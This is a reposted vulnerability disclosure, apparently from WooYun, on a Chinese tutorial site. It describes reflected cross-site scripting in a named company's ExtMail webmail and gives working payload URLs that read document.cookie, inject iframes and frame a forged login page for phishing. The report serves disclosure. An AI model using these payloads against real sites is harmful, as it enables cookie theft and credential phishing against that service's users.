好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

十九楼某关键内部系统跨站伪造登陆框 - 网站安

1.跨站

2.伪造登陆框

 

邮箱 系统 :

https://mail.19lou.com/extmail/cgi/index.cgi

 

extmail几处反射性跨站,

https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&error=badlogi

 

 

....

加载ifream

https://mail.19lou.com//extman/cgi/signup.cgi?domain=%3Ciframe%20src=%22http://wooyun.org%22%20width=%22500%22%20height=%22180%22%3E&error=badlogi

 

(图略)

 

伪造登陆框

https://mail.19lou.com/extmail/cgi/index.cgi?__mode=%22%3E%3Ciframe%20src=%22http://127.0.0.1/false.htm%22%20width=%22800%22%20height=%22980%22%20frameborder=0%20%3E%20&error=badlogi

 

伪造效果还行:

 

加载的外部false.htm

 

false.htm内容

修复方案:

貌似版本有点旧了

查看更多关于十九楼某关键内部系统跨站伪造登陆框 - 网站安的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14429
  阅读:44次

上一篇: 破那个垃圾安全狗技术总汇 - 网站安全 - 自学p

下一篇:寻医问药提问存储型xss一枚,bypass现有安全机制

相关资讯